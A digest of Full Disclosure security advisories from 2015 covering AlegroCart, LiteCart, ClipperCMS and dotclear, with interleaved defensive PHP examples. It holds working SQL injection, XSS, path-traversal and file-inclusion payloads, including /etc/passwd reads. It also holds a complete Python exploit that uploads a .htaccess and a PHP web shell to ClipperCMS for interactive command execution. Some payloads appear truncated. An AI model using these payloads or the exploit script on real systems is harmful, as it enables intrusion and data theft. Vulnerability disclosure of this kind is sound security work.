>> To mitigate this issue please upgrade at least to version 1.3.3:
>
> This seems to be the same vulnerability as CVE-2014-7183[1] found by
> Netsparker[2]. CVE-2014-7183 was fixed in version 1.2 according to the
> changelog.
>
> 1: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7183
> 2: https://www.netsparker.com/xss-vulnerabilities-in-litecart/
>
[FD] AlegroCart 1.2.8: SQL Injection
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: AlegroCart 1.2.8
Fixed in: Patch AC128_fix_17102015
Patch Link: http://forum.alegrocart.com/download/file.php?id=1040
Vendor Website: http://alegrocart.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

There is a blind SQL injection in the admin area of AlegroCart. Additionally, there is a blind SQL injection when a customer purchases a product. Because of a required interaction with PayPal, this injection is hard to exploit for an attacker.

3. Blind SQL Injection (Admin)

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

When viewing the list of uploaded files - or images -, the function check_download is called. This function performs a database query with the unsanitized name of the file. Because of this, an attacker can upload a file containing SQL code in its name, which will be executed once files are listed.

Note that a similar function - check_filename - is called when deleting a file, making it likely that this operation is vulnerable as well.

Admin credentials are required to exploit this issue.
Proof of Concept

POST /ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download&action=insert HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en; __atuvc=4%7C37
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---16690383031191084421650661794
Content-Length: 865

-16690383031191084421650661794
Content-Disposition: form-data; name="language[1][name]"

test
-16690383031191084421650661794
Content-Disposition: form-data; name="download"; filename="image.jpg' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(1,ENCODE('MSG','by 5 seconds')),null) -- -"
Content-Type: image/jpeg

img
-16690383031191084421650661794
Content-Disposition: form-data; name="mask"

11953405959037.jpg
-16690383031191084421650661794
Content-Disposition: form-data; name="remaining"

1
-16690383031191084421650661794
Content-Disposition: form-data; name="dc8bd9802df2ba1fd321b32bf73c62c4"

f396df6c76265de943be163e9b65878a
-16690383031191084421650661794--

Visiting http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download will trigger the injected code.

Code

/upload/admin2/model/products/model_admin_download.php

function check_download($filename){
    $result = $this->database->getRow("select * from download where filename = '".$filename."'");
    return $result;
}

function check_filename($filename){
    $results = $this->database->getRows("select filename from download where filename = '" . $filename . "'");
    return $results;
}

/upload/admin2/controller/download.php

function checkFiles() {
    $files=glob(DIR_DOWNLOAD.'*.*');
    if (!$files) {
        return;
    }
    foreach ($files as $file) {
        $pattern='/\.('.implode('|',$this->prohibited_types).')$/';
        $filename=basename($file);
        if (!preg_match($pattern,$file) && $this->validate->strlen($filename,1,128)) {
            $result = $this->modelDownload->check_download($filename);
            if (!$result) {
                $this->init($filename);
            }
        }
    }
}

4. Blind SQL Injection (Customer)

CVSS: Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

There is an SQL Injection when using PayPal as a payment method during checkout. Please note that this injection requires that a successful interaction with PayPal took place. For test purposes, we commented out the parts of the code that actually perform this interaction with PayPal.

Proof of Concept

1. Register a User
2. Buy an item, using PayPal as payment method; stop at step "Checkout Confirmation"
3. Visit this link to trigger the injection:
   http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=INJECTION.

Note that this requires a valid PayPal tx token.

The injection can be exploited blind:

http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=-1' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(5000,ENCODE('MSG','by 5 seconds')),null) %23)

However, this is rather impractical, especially considering the need for a valid PayPal token for each request. It is also possible
[FD] AlegroCart 1.2.8: LFI/RFI
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: AlegroCart 1.2.8
Fixed in: Patch AC128_fix_22102015
Patch Link: http://forum.alegrocart.com/download/file.php?id=1047
Vendor Website: http://alegrocart.com/
Vulnerability Type: LFI/RFI
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When retrieving logs, there are no checks on the given file_path parameter. Because of this, local or remote files can be included, which are then executed or printed.

Admin credentials are required to view logs.

3. Proof of Concept

Remote File:

POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---16809437203643590021165278222
Content-Length: 441

-16809437203643590021165278222
Content-Disposition: form-data; name="directory"

error_log
-16809437203643590021165278222
Content-Disposition: form-data; name="file_path"

http://localhost/shell.php
-16809437203643590021165278222
Content-Disposition: form-data; name="decrytion"

0
-16809437203643590021165278222--

Local File:

POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---16809437203643590021165278222
Content-Length: 425

-16809437203643590021165278222
Content-Disposition: form-data; name="directory"

error_log
-16809437203643590021165278222
Content-Disposition: form-data; name="file_path"

/etc/passwd
-16809437203643590021165278222
Content-Disposition: form-data; name="decrytion"

0
-16809437203643590021165278222--

For the patches AC128_fix_13102015 and AC128_fix_17102015 the following attack strings were still working:

http://localhost/shell.php?x=ls&foo=/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/
/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/../../../../../../../etc/passwd

4. Code

/upload/admin2/controller/report_logs.php

function get_file(){
    $file = '';
    if($this->request->gethtml('file_path', 'post')){
        $file = file_get_contents($this->request->gethtml('file_path', 'post'));
    }
    if($this->request->gethtml('decrytion', 'post')){
        $file = $this->ccvalidation->deCrypt($file, $this->config->get('config_token'));
    }
    if($file){
        $file = str_replace(array("\r\n", "\r", "\n"),'', $file);
    }
    return $file;
}

5. Solution

To mitigate this issue please apply this patch: TODO

Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue
11/03/2015 Vendor releases fix
11/13/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/AlegroCart-128-LFIRFI-102.html
[FD] LiteCart 1.3.2: Multiple XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: LiteCart 1.3.2
Fixed in: 1.3.3
Fixed Version Link: https://www.litecart.net/downloading?version=1.3.3.1
Vendor Contact: developm...@litecart.net
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/07/2015
Disclosed to public: 11/13/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. XSS 1

Description

The query parameter of the search is vulnerable to XSS.

Proof of Concept

http://localhost/ecommerce/litecart-1.3.2/public_html/en/search?query=";>alert(1)

Code

public_html/pages/search.inc.php

document::$snippets['title'][] = empty($_GET['query']) ? language::translate('title_search_results', 'Search Results') : sprintf(language::translate('title_search_results_for_s', 'Search Results for "%s"'), $_GET['query']);

3. XSS 2

Description

The value of the GET parameter slide_id is passed to trigger_error if it is an invalid id. trigger_error does not encode input, and as LiteCart shows errors by default, this leads to an XSS vulnerability.

Proof of Concept

http://localhost/ecommerce/litecart-1.3.2/public_html/admin/?app=slides&doc=edit_slide&page=1&slide_id=alert(1)

Code

includes/controllers/ctrl_slide.inc.php

if (empty($this->data)) trigger_error('Could not find slide ('. $slide_id .') in database.', E_USER_ERROR);

4. XSS 3

Description

The value of the GET parameter doc is passed to trigger_error if it is invalid. trigger_error does not encode input, and as LiteCart shows errors by default, this leads to an XSS vulnerability.

Additionally, accessing non-existing array values leads to a notice, which contains the index unsanitized. Because of this, $app_config['docs'][$_GET['doc']] can also lead to XSS.

Proof of Concept

http://localhost/ecommerce/litecart-1.3.2/public_html/admin/?app=appearance&doc=alert(1)

Code

admin/index.php

if (!empty($_GET['doc'])) {
    if (empty($app_config['docs'][$_GET['doc']]) || !file_exists(FS_DIR_HTTP_ROOT . WS_DIR_ADMIN . $_GET['app'].'.app/' . $app_config['docs'][$_GET['doc']])) trigger_error($_GET['app'] .'.app/'. $_GET['doc'] . ' is not a valid admin document', E_USER_ERROR);
    include vmod::check(FS_DIR_HTTP_ROOT . WS_DIR_ADMIN . $_GET['app'].'.app/' . $app_config['docs'][$_GET['doc']]);
} else {
    include vmod::check(FS_DIR_HTTP_ROOT . WS_DIR_ADMIN . $_GET['app'].'.app/' . $app_config['docs'][$app_config['default']]);
}

5. Solution

To mitigate this issue please upgrade at least to version 1.3.3:
https://www.litecart.net/downloading?version=1.3.3.1

Please note that a newer version might already be available.

6. Report Timeline

09/07/2015 Informed Vendor about Issue
10/05/2015 Vendor releases fix
11/13/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/LiteCart-132-Multiple-XSS-72.html
[FD] ClipperCMS 1.3.0: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: ClipperCMS 1.3.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.clippercms.com/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

There are various XSS vulnerabilities in ClipperCMS 1.3.0. Some require specific non-default settings, while others do not require these settings.

3. XSS 1

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Proof of Concept

http://localhost/ClipperCMS-clipper_1.3.0/manager/media/browser/mcpuk/connectors/php/connector.php?foo=bar

4. XSS 2

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

The name, email, message, and subjected parameter of the Contact form are vulnerable to XSS. Contrary to the XSS issues in the admin area described below, these XSS issues work without clickjacking or specific settings regarding referers.

Proof of Concept

The POCs for name and subjected are equivalent to this POC for email:

http://localhost/ClipperCMS-clipper_1.3.0/index.php?id=6"; method="POST">

POC for message:

http://localhost/ClipperCMS-clipper_1.3.0/index.php?id=6"; method="POST"> alert(1)" />

5. XSS 3

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description

The search field of the System Events page is vulnerable to XSS. To execute the provided POC, the setting "Validate HTTP_REFERER headers" should be set to false. Please note that it is likely possible to exploit this issue via ClickJacking even if that setting is set to true.

Proof of Concept

http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=114"; method="POST">

6. XSS 4ff

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description

Multiple parameters of various components of the admin area are vulnerable to XSS. To execute these POCs, the setting "Validate HTTP_REFERER headers" should be set to false.

Proof of Concept

http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=75&r=);}alert(1);function foo(){doRefresh(
http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=31&mode=drill&path=foo';alert(1);var bar='
http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=88";>&id=1
http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=114&id=&listmode=";>&op=&search=test
http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1";>

7. Solution

This issue has not been fixed by the vendor.

8. Report Timeline

10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/ClipperCMS-130-XSS-101.html
[FD] ClipperCMS 1.3.0: Path Traversal
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: ClipperCMS 1.3.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.clippercms.com/
Vulnerability Type: Path Traversal
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

Description

The "file" parameter of the file browser is vulnerable to directory traversal, allowing the download of arbitrary files. A user account is needed with at least the lowest default role, which is "Editor".

3. Proof of Concept

POST /ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/browse.php?type=images&lng=en&act=download HTTP/1.1

dir=images&file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

4. Code

/ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/core/browser.php

protected function act_download() {
    $dir = $this->postDir();
    if (!isset($this->post['dir']) ||
        !isset($this->post['file']) ||
        (false === ($file = "$dir/{$this->post['file']}")) ||
        !file_exists($file) ||
        !is_readable($file)
    )
        $this->errorMsg("Unknown error.");

    header("Pragma: public");
    header("Expires: 0");
    header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
    header("Cache-Control: private", false);
    header("Content-Type: application/octet-stream");
    header('Content-Disposition: attachment; filename="' . str_replace('"', "_", $this->post['file']) . '"');
    header("Content-Transfer-Encoding: binary");
    header("Content-Length: " . filesize($file));
    readfile($file);
    die;
}

5. Solution

This issue has not been fixed by the vendor.

6. Report Timeline

10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/ClipperCMS-130-Path-Traversal-98.html
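Both the AlegroCart get_file() above (file_path handed straight to file_get_contents) and the kcfinder act_download() here (file joined onto $dir with no containment check) share one missing step: resolving the requested name and confirming it still lies under the intended base directory. The following is an added example, not vendor code from either project, of that check in PHP 8; resolveInsideBase() and readLogFile() are names chosen here, and the temp directory layout is constructed for the self-check.

```php
<?php
// Added example, not vendor code. Confine a request-supplied file name to one base
// directory before reading it. Covers the directory-traversal shape
// (file=../../../../etc/passwd) and the LFI/RFI shape (file_path=http://host/shell.php,
// file_path=/etc/passwd): realpath() returns false for stream wrappers and for paths
// that do not exist, and a resolved path outside the base directory is rejected.

function resolveInsideBase(string $base, string $requested): ?string
{
    // Refuse anything that looks like a URL scheme or stream wrapper, and NUL bytes.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $requested) || str_contains($requested, "\0")) {
        return null;
    }
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    $target = realpath($baseReal . DIRECTORY_SEPARATOR . $requested);
    if ($target === false) {
        return null;                      // does not exist, or not resolvable
    }
    // Containment: the resolved target must be a descendant of the base directory.
    // The trailing separator prevents /logs matching a sibling such as /logs_old.
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;                      // escaped the base via .. or a symlink
    }
    return $target;
}

// Hardened counterpart to the shape of get_file(): only regular files below the
// configured log directory can be read.
function readLogFile(string $logDir, string $requestedName): ?string
{
    $path = resolveInsideBase($logDir, $requestedName);
    if ($path === null || !is_file($path)) {
        return null;
    }
    return file_get_contents($path);
}

// Self-check against a constructed directory layout in the system temp dir.
$base = sys_get_temp_dir() . '/logs_' . bin2hex(random_bytes(4));
mkdir($base . '/error_log', 0700, true);
file_put_contents($base . '/error_log/app.log', "constructed log line\n");

$cases = [
    'error_log/app.log'              => true,   // legitimate request
    '../../../../../../etc/passwd'   => false,  // traversal from the base
    'error_log/../../../etc/passwd'  => false,  // traversal after a valid prefix
    '/etc/passwd'                    => false,  // absolute path (advisory's local-file case)
    'http://localhost/shell.php'     => false,  // remote include attempt
    'php://filter/resource=app.log'  => false,  // stream wrapper
    'error_log/missing.log'          => false,  // non-existent file
];
foreach ($cases as $name => $expectAllowed) {
    $allowed = readLogFile($base, $name) !== null;
    printf("%-34s %s\n", $name, $allowed === $expectAllowed ? 'ok' : 'MISMATCH');
}
```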
[FD] ClipperCMS 1.3.0: SQL Injection
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: ClipperCMS 1.3.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.clippercms.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

There are multiple SQL Injection vulnerabilities in ClipperCMS 1.3.0. An account with the role "Publisher" or "Administrator" is needed to exploit each of these vulnerabilities.

3. SQL Injection 1 (Blind)

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

The id parameter of the web user editor is vulnerable to blind SQL Injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default.

Proof of Concept

http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(5000,ENCODE('MSG','by 5 seconds')),null) %23
-> true

http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='4',BENCHMARK(5000,ENCODE('MSG','by 5 seconds')),null) %23
-> false

Code

/manager/actions/mutate_web_user.dynamic.php

$sql = "SELECT * FROM $dbase.`".$table_prefix."web_groups` where webuser=".$_GET['id']."";

4. SQL Injection 2

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

When updating a user, the newusername parameter is vulnerable to SQL injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default.

Proof of Concept

POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1

mode=12&id=3&blockedmode=0&stay=&oldusername=testtest &newusername=testtest' or extractvalue(1,concat(0x7e,(SELECT concat(user) FROM mysql.user limit 0,1))) -- - &newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo3%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=&gender=&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query

Code

/manager/processors/save_user_processor.php

$sql = "UPDATE " . $modx->getFullTableName('manager_users') . " SET username='$newusername'" . $updatepasswordsql . " WHERE id=$id";

5. SQL Injection 3

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

When updating a user, the country, role, blocked, blockeduntil, blockedafter, failedlogincount, and gender parameter are vulnerable to SQL injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default.

Proof of Concept

The proof of concepts for the country, role, blocked, blockeduntil, failedlogincount, and blockedafter parameter are analogous to this POC for gender:

POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1

mode=12&id=3&blockedmode=0&stay=&oldusername=testtest&newusername=testtest&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo6%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob= &gender=2', fax=(SELECT concat(user) FROM mysql.user limit 0,1), dob='0 &comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query

Visiting the overview page of that user will show the result of the injected query.

Code

/manager/processors/save_user_processor.php

$sql = "UPDATE " . $modx->getFullTableName('user_attributes') . " SET fullname='$fullname', role='$roleid', email='$email', phone='$phone', mobilephone='$mobilephone', fax='$fax', zip='$zip', state='$state', country='$country', gender='$ge
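The AlegroCart check_download() earlier on this page and the ClipperCMS save_user_processor.php UPDATE above both splice strings into SQL: in the first case the string is a file name read back from disk, in the second a POST field. The following is an added example, not code from either project, of the same two query shapes written with PDO bound parameters against an in-memory SQLite table; the pdo_sqlite extension, the PDO setup and the function names are assumptions, while the table and column names follow the advisories.

```php
<?php
// Added example, not vendor code. The two vulnerable query shapes from the
// advisories rewritten with bound parameters. Assumes the pdo_sqlite extension;
// the table contents are constructed for the demonstration.

function openDemoDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE download (download_id INTEGER PRIMARY KEY, filename TEXT NOT NULL)');
    $db->exec('CREATE TABLE manager_users (id INTEGER PRIMARY KEY, username TEXT NOT NULL)');
    $db->exec("INSERT INTO download (filename) VALUES ('image.jpg'), ('manual.pdf')");
    $db->exec("INSERT INTO manager_users (id, username) VALUES (3, 'testtest')");
    return $db;
}

// Counterpart to check_download(): the file name, even one read back from the
// filesystem by glob(), is bound as data and never concatenated into the query.
function checkDownload(PDO $db, string $filename): ?array
{
    $stmt = $db->prepare('SELECT * FROM download WHERE filename = :filename');
    $stmt->execute([':filename' => $filename]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Counterpart to the UPDATE in save_user_processor.php: the username is bound as
// a string, and the id is validated as an integer before being bound as one.
function renameUser(PDO $db, $id, string $newUsername): int
{
    if (filter_var($id, FILTER_VALIDATE_INT) === false) {
        throw new InvalidArgumentException('id must be an integer');
    }
    $stmt = $db->prepare('UPDATE manager_users SET username = :username WHERE id = :id');
    $stmt->bindValue(':username', $newUsername, PDO::PARAM_STR);
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

$db = openDemoDb();

// A legitimate name is found; a quote-bearing name is compared as a plain string.
$legit    = checkDownload($db, 'image.jpg');
$injected = checkDownload($db, "image.jpg' AND 1=1 -- -");
printf("image.jpg found: %s\n", $legit !== null ? 'yes' : 'no');
printf("quote-bearing name found: %s\n", $injected !== null ? 'yes' : 'no');

// A username carrying SQL syntax is stored verbatim rather than interpreted.
$payload = "testtest' or 1=1 -- -";
printf("rows updated: %d\n", renameUser($db, '3', $payload));
$stored = $db->query('SELECT username FROM manager_users WHERE id = 3')->fetchColumn();
printf("stored value equals submitted string: %s\n", $stored === $payload ? 'yes' : 'no');

// A non-integer id is refused before any SQL runs.
try {
    renameUser($db, '3 or 1=1', 'x');
} catch (InvalidArgumentException $e) {
    printf("rejected id: %s\n", $e->getMessage());
}
```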
[FD] ClipperCMS 1.3.0: CSRF
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: ClipperCMS 1.3.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.clippercms.com/
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS: Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

The only protection against CSRF is a referer check. This check can be disabled by a user with the rights to edit settings, thus making the application vulnerable to CSRF.

A user may choose to disable referer checks, because when they are enabled, external links or direct entry/bookmarks to specific pages in the backend do not work, which severely limits the usability of the application.

3. Solution

This issue has not been fixed by the vendor.

4. Report Timeline

10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/ClipperCMS-130-CSRF-97.html
[FD] ClipperCMS 1.3.0: Code Execution Exploit
#!/usr/local/bin/python

# Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
# An account is required with rights to file upload (eg a user in the Admin, Publisher, or Editor role)
# The server must parse htaccess files for this exploit to work.
# Curesec GmbH c...@curesec.com

import sys
import re
import requests  # requires requests lib

if len(sys.argv) != 4:
    exit("usage: python " + sys.argv[0] + " http://example.com/ClipperCMS/ admin admin")

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

loginPath = "/manager/processors/login.processor.php"
fileManagerPath = "/manager/index.php?a=31"


def login(requestSession, url, username, password):
    postData = {"ajax": "1", "username": username, "password": password}
    return requestSession.post(url, data=postData, headers={"referer": url})


def getFullPath(requestSession, url):
    request = requestSession.get(url, headers={"referer": url})
    if "You don't have enough privileges" in request.text:
        return "cant upload"
    fullPath = re.search("var current_path = '(.*)';", request.text)
    return fullPath.group(1)


def upload(requestSession, url, fileName, fileContent, postData):
    filesData = {"userfile[0]": (fileName, fileContent)}
    return requestSession.post(url, files=filesData, data=postData, headers={"referer": url})


def workingShell(url, fullPath):
    return fullPath.strip("/") in requests.get(url + "pwd", headers={"referer": url}).text.strip("/")


def runShell(url):
    print("enter command, or enter exit to quit.")
    command = raw_input("$ ")
    while "exit" not in command:
        print(requests.get(url + command).text)
        command = raw_input("$ ")


requestSession = requests.session()

loginResult = login(requestSession, url + loginPath, username, password)
if "Incorrect username" in loginResult.text:
    exit("ERROR: Incorrect username or password")
else:
    print("successful: login as " + username)

fullPath = getFullPath(requestSession, url + fileManagerPath)
if fullPath == "cant upload":
    exit("ERROR: user does not have required privileges")
else:
    print("successful: user is allowed to use file manager. Full path: " + fullPath)

uploadResult = upload(requestSession, url + fileManagerPath, ".htaccess", "AddType application/x-httpd-php .png", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
    exit("ERROR: could not upload .htaccess file")
else:
    print("successful: .htaccess upload")

uploadResult = upload(requestSession, url + fileManagerPath, "404.png", "", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
    exit("ERROR: could not upload shell")
else:
    print("successful: shell upload. Execute commands via " + url + "404.png?x=")

if workingShell(url + "404.png?x=", fullPath):
    print("successful: shell seems to be working")
else:
    exit("ERROR: shell does not seem to be working correctly")

runShell(url + "404.png?x=")

#Blog Reference:
#http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-Exploit-96.html
[FD] ClipperCMS 1.3.0: Code Execution
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: ClipperCMS 1.3.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.clippercms.com/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

The file upload uses a whitelist to only allow non-dangerous file extensions. However, it does allow the upload of .htaccess files, which means that an attacker can upload files with any extension and still gain code execution.

An account is required to upload files. The role the account is in needs the right to upload files. By default, the lowest user role - Editor - has this right.

3. Proof of Concept

The file upload can be found here:
http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=31

To gain code execution, upload a .htaccess file with the content:

AddType application/x-httpd-php .png

Now, any uploaded file containing PHP code with the extension .png will be executed.

4. Solution

This issue has not been fixed by the vendor.

5. Report Timeline

10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-95.html
[FD] dotclear 2.8.1: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: dotclear 2.8.1
Fixed in: 2.8.2
Fixed Version Link: http://download.dotclear.org/latest.zip
Vendor Website: http://dotclear.org/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 11/13/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description

